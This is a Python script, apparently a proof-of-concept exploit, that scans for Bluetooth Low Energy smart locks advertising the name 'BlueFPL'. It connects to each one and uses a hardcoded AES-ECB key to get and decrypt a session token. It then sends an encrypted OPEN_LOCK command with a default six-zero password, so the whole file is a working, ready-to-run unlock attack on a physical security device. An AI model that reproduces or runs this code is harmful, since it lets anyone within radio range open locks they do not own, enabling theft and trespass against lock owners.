from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import ECB
from cryptography.hazmat.backends import default_backend
import binascii
from bluepy.btle import Scanner,Peripheral,DefaultDelegate
KEY = "241F632E5907042061014C1A3A45193B"
TOKEN = ""
class NotifyDelegate(DefaultDelegate):
def __init__(self,params):
DefaultDelegate.__init__(self)
def handleNotification(self,cHandle,data):
global TOKEN
print("Notification from Handle: 0x" + format(cHandle,"02X"))
TOKEN = decrypt(binascii.hexlify(data))
print(TOKEN)
def decrypt(plaintext):
key = binascii.unhexlify(KEY)
# 创建 AES 密钥
if len(key) == 16: # 128 bit
algorithm = algorithms.AES(key)
else:
raise ValueError("Invalid key size")
# 创建解密器
backend = default_backend()
cipher = Cipher(algorithm, modes.ECB(), backend=backend)
decryptor = cipher.decryptor()
# 解密密文
encrypted_data = binascii.unhexlify(plaintext)
decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()
# 解密结果
return binascii.hexlify(decrypted_data)
def encrypt(plaintext):
# 将密钥从16进制字符串转换为字节数组
key = binascii.unhexlify(KEY)
# 创建AES加密器对象
backend = default_backend()
algorithm = algorithms.AES(key)
cipher = Cipher(algorithm, modes.ECB(), backend=backend)
encryptor = cipher.encryptor()
# 对明文进行加密
decrypted_data = binascii.unhexlify(plaintext)
encrypted_data = encryptor.update(decrypted_data) + encryptor.finalize()
# 将密文转换为16进制字符串返回
return binascii.hexlify(encrypted_data)
def done(addr):
global TOKEN
print("[+]Find BlueFPL")
print("[+]Try Connecting.....")
conn = Peripheral(addr)
if conn:
print("[+]Connecting successfully!")
conn.withDelegate(NotifyDelegate(conn))
else:
print("[+]Fail to connet")
exit(1)
print("[+]Try find fee7")
svc_uuid = "0000fee7-0000-1000-8000-00805f9b34fb"
svc = conn.getServiceByUUID(svc_uuid)
if svc :
print("[+]Found fee7!")
else :
print("[+]fee7 not found")
exit(1)
print(svc.uuid)
TX_CHAR = conn.getCharacteristics(uuid = "000036f5-0000-1000-8000-00805f9b34fb")[0]
RX_CHAR = conn.getCharacteristics(uuid = "000036f6-0000-1000-8000-00805f9b34fb")[0]
print("[+]Try GET_TOKEN")
pd = "06010101000000000000000000000000"
hEcg = RX_CHAR.getHandle()
hEcgcc = 0
for descriptor in conn.getDescriptors(hEcg,svc.hndEnd):
if (descriptor.uuid == 0x2902):
print("[+]Found descriptor handle")
hEcgcc = descriptor.handle
if hEcgcc == 0:
print("Fail to find descriptor handle")
exit(1)
print("[+]Descriptor handle:"+str(hEcgcc))
conn.writeCharacteristic(hEcgcc,bytes([1,0]))
while True:
if conn.waitForNotifications(1.0):
break
print("Wating....")
TX_CHAR.write(binascii.unhexlify(encrypt(pd)))
TOKEN = TOKEN[6:14]
print(b"[+]TOKEN:"+TOKEN)
print("[+]Try OPEN_LOCK")
pd = b"050106303030303030"+TOKEN+b"000000"
TX_CHAR.write(binascii.unhexlify(encrypt(pd)))
print("[+]Open successfully!")
conn.disconnect()
if __name__ == "__main__":
scanner = Scanner()
devices = scanner.scan(timeout = 3)
for dev in devices:
if dev.getValueText(9) and ("BlueFPL" in dev.getValueText(9)):
done(dev.addr)